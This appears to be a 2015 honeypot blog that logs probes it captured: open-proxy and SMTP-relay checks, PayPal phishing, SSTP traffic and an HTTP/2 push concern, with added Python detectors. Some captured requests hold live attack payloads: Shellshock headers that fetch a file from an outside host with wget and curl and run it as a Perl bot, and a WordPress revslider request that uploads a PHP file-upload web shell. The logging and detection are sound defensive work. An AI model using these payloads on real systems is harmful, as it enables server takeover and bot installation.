Monday, 31 August 2015

24x7-allrequestsallowed.com - 146.185.239.100

BEGIN OF HTTP DATA:
2015-08-31 21:33:47
Source IP: 146.185.239.100
Country: RU RiskScore: 1 Malware: []
GET http://24x7-allrequestsallowed.com/?PHPSESSID=mg2adea600143P%5BVJWPHYCF%5DJOU HTTP/1.1
Host: 24x7-allrequestsallowed.com
Accept: */*
Proxy-Connection: Keep-Alive
I find these requests from time to time on my server. Executing the request by hand leads to:
curl http://24x7-allrequestsallowed.com/?PHPSESSID=mg2adea600143P%5BVJWPHYCF%5DJOU
Thank you for using our service
So it looks like a check for open proxies, i.e. servers that will fetch outside URLs on the client's behalf.

Blacklist Status: BLACKLISTED 3/40
IP Address: 146.185.239.100
Reverse DNS: Unknown
ASN: AS5577
ASN Owner: root SA
ISP: Petersburg Internet Network ltd.
Continent: Europe
Country Code: (RU) Russian Federation


Perl favicon.icon Download attempt - 211.144.37.41


BEGIN OF HTTP DATA:
2015-08-30 15:49:21
Source IP: 211.144.37.41
Country: CN RiskScore: 10 Malware: []
GET /phppath/cgi_wrapper HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://46.38.251.16/favicon.icon;curl http://46.38.251.16/favicon.icon;GET http://46.38.251.16/favicon.icon;lwp-download http://46.38.251.16/favicon.icon;lynx http://46.38.251.16/favicon.icon ");'
Host: 195.169.125.87
Connection: Close
Sadly I get a connection refused by the server, so I am unable to get the specified file.

The source IP:
Blacklist Status: BLACKLISTED 13/40
IP Address: 211.144.37.41
Reverse DNS: Unknown
ASN: AS9811
ASN Owner: srit corp.,beijing.
ISP: China Network Information Center
Continent: Asia

The download IP:
Blacklist Status: POSSIBLY SAFE 0/40
IP Address: 46.38.251.16
Reverse DNS: v220100240662590.yourvserver.net
ASN: AS197540
ASN Owner: netcup GmbH
ISP: netcup GmbH
Continent: Europe

IBM X-Force data for 211.144.37.41:
"cats": {
   "Anonymisation Services": 86,
   "Spam": 100
},
"geo": {
   "country": "China",
   "countrycode": "CN"
},

Sunday, 30 August 2015

The /tmUnblock.cgi attack

I guess you all know about the /tmUnblock.cgi stuff, as discussed on SANS.
Basically this is all about a Linksys-related vulnerability.

To clean up my vacation logs :-) I will just post the IPs I have seen.


Tuesday, 18 August 2015

Open SMTP relay search - gogo@linwayedm.com.tw

I received the following request on all of my honeypots:
BEGIN OF SMTP DATA
177.70.77.242
Country: BR RiskScore: 5.7 Malware: []
uwfdphjcaq@163.com
gogo@linwayedm.com.tw
507
Message-ID: <KUOQLISRUMNOCFSJTHUIL@163.com>
From: "0806" <ltcxjrerz@163.com>
Reply-To: "0806" <darnexinwsq@163.com>
To: gogo@linwayedm.com.tw
Subject: BC_195.169.125.87
Date: Tue, 18 Aug 2015 09:31:21 +0500
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="--585038594152556471"
X-Priority: 3
X-MSMail-Priority: Normal

----585038594152556471
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable



----585038594152556471--

END OF DATA
Actually, I think this is pretty nice. The attacker searches for open SMTP relay servers by sending an email to gogo@linwayedm.com.tw with the subject BC_<IPaddress>. So if you have a SPAM honeypot you may want to subscribe :-)


Blacklist Status: BLACKLISTED 5/40
IP Address: 177.70.77.242
Reverse DNS: 242.77.70.177.mksnet.com.br
ASN: Unknown
ASN Owner: Unknown
ISP: Unknown
Continent: South America

Sunday, 16 August 2015

Perl DDoS Bot - 222.241.151.149

BEGIN OF HTTP DATA:
2015-08-16 17:09:08
Source IP: 222.241.151.149
Country: CN RiskScore: 1 Malware: []
GET /cgi-bin/php5 HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: () { :;};/usr/bin/perl -e 'print "Content-Type: text/plain\r\n\r\nXSUCCESS!";system("wget http://www.7soles.com/js/a2.log -O /tmp/a2.log;curl -O /tmp/a2.log http://www.7soles.com/js/a2.log;perl /tmp/a2.log;rm -rf /tmp/a2.log*");'
Host: 109.234.106.8
Connection: Close
The downloaded Perl script is identified as:
a2.log: Perl.ShellBot-4 FOUND
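As an added example (my own code, not from this blog), here is how a honeypot or WAF could classify the requests shown in the open-proxy post (24x7-allrequestsallowed.com) and in the two Shellshock posts: it flags absolute-URI request lines as proxy probes, detects the bash function-definition marker in header values, and extracts the URLs a payload would fetch so they can be blocked. The sample requests are constructed from the log excerpts with shortened payloads; the function names are assumptions of this example.

```python
import re
from typing import Dict, List, Tuple

# Bash function-definition marker that Shellshock payloads start with ("() { :;};...").
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
URL_RE = re.compile(r"https?://[^\s\"';)]+")


def parse_request(raw: str) -> Tuple[str, str, Dict[str, str]]:
    """Split a raw HTTP request into (method, target, lowercase header dict)."""
    lines = raw.strip().splitlines()
    method, target, _version = lines[0].split(maxsplit=2)
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        if not line.strip():
            break  # end of header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers


def classify_request(raw: str) -> Dict[str, object]:
    """Return findings plus any URLs worth blocking (proxy target or payload download sites)."""
    method, target, headers = parse_request(raw)
    findings: List[str] = []
    urls: List[str] = []
    # A forward-proxy request carries an absolute URI in the request line (and often Proxy-Connection).
    if re.match(r"https?://", target, re.I) or "proxy-connection" in headers:
        findings.append("open-proxy probe")
        urls.append(target)
    for value in headers.values():
        if SHELLSHOCK_RE.search(value):
            findings.append("shellshock header payload")
            urls.extend(URL_RE.findall(value))  # download sites the payload would contact
    return {"method": method, "target": target, "findings": findings, "urls": sorted(set(urls))}


# Constructed samples modelled on the log excerpts in the posts above (payload shortened).
PROXY_PROBE = (
    "GET http://24x7-allrequestsallowed.com/?PHPSESSID=abc HTTP/1.1\r\n"
    "Host: 24x7-allrequestsallowed.com\r\nAccept: */*\r\nProxy-Connection: Keep-Alive\r\n\r\n"
)
SHELLSHOCK_PROBE = (
    "GET /cgi-bin/php5 HTTP/1.1\r\n"
    "User-Agent: () { :;};/usr/bin/perl -e 'print \"XSUCCESS!\";system(\"wget http://www.7soles.com/js/a2.log"
    " -O /tmp/a2.log;curl -O /tmp/a2.log http://www.7soles.com/js/a2.log;perl /tmp/a2.log\");'\r\n"
    "Host: 109.234.106.8\r\nConnection: Close\r\n\r\n"
)

if __name__ == "__main__":
    for sample in (PROXY_PROBE, SHELLSHOCK_PROBE):
        print(classify_request(sample))
```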


Blacklist Status: BLACKLISTED 5/40
IP Address: 222.241.151.149
Reverse DNS: Unknown
ASN: AS4134
ASN Owner: Chinanet
ISP: Chinanet Hunan Province Network
Continent: Asia
Country Code: (CN) China
Latitude / Longitude: 28.1792 / 113.114
City: Changsha
Region: Hunan

Thursday, 13 August 2015

fiducia.de branded PayPal SPAM - 136.243.226.145

I received two PayPal SPAM emails:

Message-ID: <55CB7A6D.A9A1ACC4@jsany.me>
Date: Wed, 12 Aug 2015 16:55:09 +0200
From: "www.vr.de" <info@jsany.me>
Subject:
 109.234.106.8:25:info@jsany.me:info:"www.vr.de"<info@jsany.me>:nossl::::0:
To: check212016@gmail.com
Content-Type: multipart/mixed;
 boundary="IQEb8Kelq9=_nIw8HiEcGKJxgVtTg4sapX"
MIME-Version: 1.0
X-Mailer: Mozilla 3.04 (WinNT; I)

This is a multi-part message in MIME format
The body of the email reads like a PayPal email:
Hallo lieber PayPal Kunde,
Bitte helfen Sie uns dabei, Ihr Konto wieder in Ordnung zu bringen. Bi=
s dahin haben wir den Zugang zu Ihrem Konto vor=C3=BCbergehend eingesc=
hr=C3=A4nkt.Wo liegt das Problem?Bei Ihrer Kreditkarte sind uns ungew=C3=
=B6hnliche Aktivit=C3=A4ten aufgefallen.Verifizieren Sie sich durch ei=
n Abgleich Ihrer Daten um Ihr Konto wieder Uneingeschr=C3=A4nkt nutzen=
 zu k=C3=B6nnen.Was mache ich jetzt ?

Schritt 1: =C3=96ffnen sie das Formular im Anhang
Schritt 2: Best=C3=A4tigen Sie in Ihrem PayPal-Konto IhreBankdaten
Schritt 3: Verifizieren Sie Ihre Kreditkarte
PayPal Email ID: 6741-9940Viele Gr=C3=BC=C3=9FeIhr Team von PayPal Deu=
tschland522883572783056722171403984794
Attached was a document.html file, which looks like the basic PayPal login form.

You can find the full message and the decoded document on my Drive Share; the password is "spam".

IBM X-Force shows a risk score of 5.7, and the IP is known for SPAM activity.

Sunday, 9 August 2015

SSTP establishment - 109.234.39.46

BEGIN OF HTTPS DATA:
2015-08-08 14:25:47
Source IP: 109.234.39.46
Country: RU RiskScore: 1 Malware: []
SSTP_DUPLEX_POST /sra_{BA195980-CD49-458b-9E23-C84EE0ADCD75}/ HTTP/1.1
Host: 109.234.106.8
SSTPCORRELATIONID: {5a433238-8781-11e3-b2e4-4e6d617021}
Content-Length: 18446744073709551615
This request reached the HTTPS part of my honeypot yesterday. I am posting this more out of curiosity, as it is the first time I see this type of request. A bit of googling led to
https://msdn.microsoft.com/en-us/library/cc247364.aspx, which shows that this is part of a Microsoft Secure Socket Tunneling Protocol (SSTP) initialization: the client opens the tunnel with SSTP_DUPLEX_POST, and the Content-Length of 18446744073709551615 (2^64 - 1) is the value the protocol specifies so that the HTTP connection stays open for the tunnelled traffic.

Blacklist Status: POSSIBLY SAFE 0/40
IP Address: 109.234.39.46
Reverse DNS: server6.com
ASN: AS35415
ASN Owner: WebaZilla B.V.
ISP: McHost.Ru
Continent: Europe
Country Code: (RU) Russian Federation
Latitude / Longitude: 55.75 / 37.6166
City: Unknown
Region: Unknown

Saturday, 8 August 2015

Wordpress NULLpOint7r__zemua.php - 192.203.127.198

BEGIN OF HTTP DATA:
2015-08-07 18:24:03
Source IP: 192.203.127.198
Country: US RiskScore: 1 Malware: []
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: johest.de
Content-Length: 654
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=d7711a4c77de4aff8673ca44662115c1

--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="action"

revslider_ajax_action
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="client_action"

update_plugin
--d7711a4c77de4aff8673ca44662115c1
Content-Disposition: form-data; name="update_file"; filename="NULLpOint7r__zemua.php"
Content-Type: text/html

<?php @set_time_limit(0);@header('null77: pOinter');?><form method='POST' enctype='multipart/form-data'><input type='file' name='f'/><input type='submit' value='up'/></form><?php echo @copy($_FILES['f']['tmp_name'],$_FILES['f']['name'])?'ok':'no';?>
--d7711a4c77de4aff8673ca44662115c1--
This was received yesterday on my honeypot.
The attack seems to be optimized for WordPress and targets /wp-admin/admin-ajax.php directly. The action and client_action values (revslider_ajax_action, update_plugin) address the update handler of the Slider Revolution (revslider) plugin, and as you can see in the code, it tries to upload a PHP file: the uploaded file is itself a minimal upload form that copies any further file onto the server.
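As an added example (my own code, not from this blog), the following parses a multipart/form-data body like the one captured above and flags the revslider update_plugin upload pattern. The sample body is constructed from the captured request: the boundary and filename are taken from the post, while the uploaded PHP content is replaced by a harmless stub.

```python
import re
from typing import Dict, List, Optional

PHP_EXT_RE = re.compile(r"\.(php\d?|phtml|phar)(\.|$)", re.I)


def parse_multipart(body: bytes, boundary: str) -> List[Dict[str, object]]:
    """Split a multipart/form-data body into parts with name, filename, content_type and data."""
    delimiter = b"--" + boundary.encode()
    parts: List[Dict[str, object]] = []
    for chunk in body.split(delimiter)[1:]:
        if chunk.startswith(b"--"):
            break  # closing delimiter "--boundary--"
        head, _, data = chunk.lstrip(b"\r\n").partition(b"\r\n\r\n")
        data = data[:-2] if data.endswith(b"\r\n") else data  # CRLF before the next delimiter is framing
        part = {"name": None, "filename": None, "content_type": None, "data": data}
        for line in head.decode("latin-1").split("\r\n"):
            if line.lower().startswith("content-disposition:"):
                name = re.search(r'\bname="([^"]*)"', line)  # \b keeps this from matching filename=
                filename = re.search(r'filename="([^"]*)"', line)
                part["name"] = name.group(1) if name else None
                part["filename"] = filename.group(1) if filename else None
            elif line.lower().startswith("content-type:"):
                part["content_type"] = line.split(":", 1)[1].strip()
        parts.append(part)
    return parts


def flag_revslider_upload(body: bytes, boundary: str) -> Optional[str]:
    """Return a finding when the body matches the revslider update_plugin upload pattern, else None."""
    fields = {p["name"]: p for p in parse_multipart(body, boundary)}
    action = fields.get("action", {}).get("data", b"")
    client_action = fields.get("client_action", {}).get("data", b"")
    upload = fields.get("update_file")
    if action != b"revslider_ajax_action" or client_action != b"update_plugin" or upload is None:
        return None
    filename = upload["filename"] or ""
    if PHP_EXT_RE.search(filename) or b"<?php" in upload["data"].lower():
        return f"revslider update_plugin upload of PHP file {filename!r}"
    return f"revslider update_plugin upload of {filename!r}"


# Constructed body modelled on the captured request (boundary and filename from the post, PHP stub replaced).
BOUNDARY = "d7711a4c77de4aff8673ca44662115c1"
SAMPLE_BODY = (
    b"--d7711a4c77de4aff8673ca44662115c1\r\n"
    b'Content-Disposition: form-data; name="action"\r\n\r\nrevslider_ajax_action\r\n'
    b"--d7711a4c77de4aff8673ca44662115c1\r\n"
    b'Content-Disposition: form-data; name="client_action"\r\n\r\nupdate_plugin\r\n'
    b"--d7711a4c77de4aff8673ca44662115c1\r\n"
    b'Content-Disposition: form-data; name="update_file"; filename="NULLpOint7r__zemua.php"\r\n'
    b"Content-Type: text/html\r\n\r\n<?php echo 'probe'; ?>\r\n--d7711a4c77de4aff8673ca44662115c1--\r\n"
)
```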

IBM X-Force has no record of this IP.

IPVoid instead:
Blacklist Status: BLACKLISTED 2/40
IP Address: 192.203.127.198
Reverse DNS: Unknown
ASN: AS7018
ASN Owner: AT&T Services, Inc.
ISP: Tuskegee University
Continent: North America
Country Code: (US) United States
Latitude / Longitude: 32.4172 / -85.7191
City: Tuskegee Institute
Region: Alabama

Monday, 3 August 2015

SMTP SPAM campaign - hxxp://ppt.cc/

So I have just shut down my SMTP server because of a huge influx of emails, all of them related to the same website.

Example:
Received: from 174.128.178.126 by 46.203.227.24; Mon, 03 Aug 2015 06:19:41 -0600
Message-ID: <OBQGDHMJCXMWTMUCUVHKKO@163.com>
From: "<A7>䯥<A4><CD>" <rsosmpk@163.com>
Reply-To: "<A7>䬶<A4>ͪ<BA><A8>k<A5><U+0373>̷s<A9><DB>" <iceaegrnltj@163.com>
To: QUOTED
Subject: <A7>䯥<A4>ͪ<BA><A4>k<A4>H
Date: Mon, 03 Aug 2015 17:19:41 +0500
X-Mailer: Microsoft Outlook Express 6.00.2462.0000
MIME-Version: 1.0
Content-Type: multipart/alternative;
        boundary="--0901866075153714"
X-Priority: 3
X-MSMail-Priority: Normal

----0901866075153714
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

        <span style=3D"font-size:36px;"><span style=3D"color:#b22222;"><span styl=
e=3D"font-size: 28px;">=B7s=B7s=A4H=C3=FE=AA=BA=A7=DA=AD=CC=B4N=ADn=BA=C9=B1=
=A1=A8=C9=A8=FC=B3t=AD=B9=B7R=B1=A1=AA=BA=A7=D6=B7P</span></span></span></=
p>
<p>

<p>
        <span style=3D"font-size:48px;"><b><a href=3D"hxxp://ppt.cc/II6He"><font =
color=3D"blue" face=3D"Arial">http://ppt.cc/II6He</font></a></b></span></p=
>
The a href always points to the same domain, hxxp://ppt.cc/, which redirects to www.okbank.com.tw.
I have found 55 unique IP addresses involved in this campaign.

Saturday, 1 August 2015

HTTP/2 revisited

As you may know, I published a simple blog post about "HTTP/2 PUSHing malicious content". This led to some discussions, more investigation and even more questions.

Let me describe the whole thing once again.
  1. There is this pretty and fancy new protocol. It replaces HTTP 1.1 and 1.0 and will be the next standard; officially it is version 2.0 of the HTTP standard. This new protocol is so new and fancy that my tools (I tried Wireshark, Burp Suite and OWASP ZAP) are not able to tell me anything about the traffic: it is shown as TCP only. The whole communication between server and client is frame-based and uses TLS. So instead of a nice text header like
    HTTP/1.x 200 OK
    Transfer-Encoding: chunked
    Date: Sat, 28 Nov 2009 04:36:25 GMT
    Server: LiteSpeed
    Connection: close
    X-Powered-By: W3 Total Cache/0.8
    you will see a frame: one or more binary packets holding this information.
    The body works the same way; it is frame-based and binary, and even the frames can be split. So the server responds in whatever way makes sense and multiplexes the traffic.

  2. One new feature is SERVER PUSH. The idea is that the server can send you a file for your browser to cache; maybe you need it later. As an example, let's say I have a website with a lot of animal pictures. Now I have one picture of a cat. The cat is adorable and I am pretty sure that everybody visiting my page will stop at that picture and take a look. Well, so now I am clever: I just push you the file directly at the beginning. Right from the start you have it. When you then click on the picture, your browser can show it instantly. That's a cool feature.

    So now you ask, what type of files can I push? Well, anything. I tried the EICAR test signature. It worked. Limitation: it worked with the nghttp2 tools. For Firefox I do not know, because (1) I am not able to see the traffic.
  3. So, let's combine (1) and (2). Worst case, I can push you whatever I want. Your browser will accept any packet and store it in the cache. That's step one of many bad things which can happen.
Now call me crazy or call me paranoid.
I believe that this is a thing worth talking about. I am open for discussion; just send me a mail or a message. My Google+ profile is linked on the right.
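Since the tools in point (1) show only TCP, here is an added example (my own code, not from this post) that decodes the HTTP/2 framing once the bytes are available decrypted, e.g. from a capture made with TLS key logging. It walks the 9-byte frame headers, reads the promised stream id out of PUSH_PROMISE frames, and reports whether a SETTINGS frame carried SETTINGS_ENABLE_PUSH=0, the client-side knob against point (3). The sample stream is constructed, starts after the connection preface, and concatenates both directions into one byte string for simplicity.

```python
import struct
from typing import Dict, Iterator, Optional

FRAME_TYPES = {0x0: "DATA", 0x1: "HEADERS", 0x4: "SETTINGS", 0x5: "PUSH_PROMISE"}
FLAG_PADDED = 0x8
SETTINGS_ENABLE_PUSH = 0x2  # setting identifier, RFC 7540 section 6.5.2


def iter_frames(stream: bytes) -> Iterator[Dict[str, object]]:
    """Walk HTTP/2 frames: 24-bit length, 8-bit type, 8-bit flags, 31-bit stream id, then payload."""
    pos = 0
    while pos + 9 <= len(stream):
        length = int.from_bytes(stream[pos:pos + 3], "big")
        ftype, flags = stream[pos + 3], stream[pos + 4]
        stream_id = int.from_bytes(stream[pos + 5:pos + 9], "big") & 0x7FFFFFFF
        payload = stream[pos + 9:pos + 9 + length]
        if len(payload) < length:
            break  # truncated capture
        pos += 9 + length
        yield {"type": FRAME_TYPES.get(ftype, hex(ftype)), "flags": flags, "stream_id": stream_id, "payload": payload}


def promised_stream(frame: Dict[str, object]) -> Optional[int]:
    """Promised stream id of a PUSH_PROMISE frame (the rest of the payload is the HPACK header block)."""
    if frame["type"] != "PUSH_PROMISE":
        return None
    payload = frame["payload"]
    if frame["flags"] & FLAG_PADDED:  # first byte is the pad length, padding sits at the end
        payload = payload[1:len(payload) - payload[0]]
    return int.from_bytes(payload[:4], "big") & 0x7FFFFFFF


def push_enabled(frame: Dict[str, object]) -> Optional[bool]:
    """Value of SETTINGS_ENABLE_PUSH in a SETTINGS frame, or None when the frame does not carry it."""
    if frame["type"] != "SETTINGS":
        return None
    result = None
    for off in range(0, len(frame["payload"]), 6):  # each setting is a 16-bit id and a 32-bit value
        ident, value = struct.unpack_from("!HI", frame["payload"], off)
        if ident == SETTINGS_ENABLE_PUSH:
            result = value == 1
    return result


def build_frame(ftype: int, flags: int, stream_id: int, payload: bytes) -> bytes:
    return len(payload).to_bytes(3, "big") + bytes([ftype, flags]) + stream_id.to_bytes(4, "big") + payload


# Constructed sample: client SETTINGS with ENABLE_PUSH=0, then a padded server PUSH_PROMISE on stream 1
# promising stream 2 (0x82 0x84 = HPACK indexed ":method GET" and ":path /", 2 bytes of padding).
SAMPLE_STREAM = build_frame(0x4, 0, 0, struct.pack("!HI", SETTINGS_ENABLE_PUSH, 0)) + build_frame(
    0x5, FLAG_PADDED, 1, bytes([2]) + (2).to_bytes(4, "big") + b"\x82\x84" + b"\x00\x00")
```

A PUSH_PROMISE seen after the client sent ENABLE_PUSH=0 is a protocol violation, which is exactly the kind of thing a decoder like this lets you check from a capture.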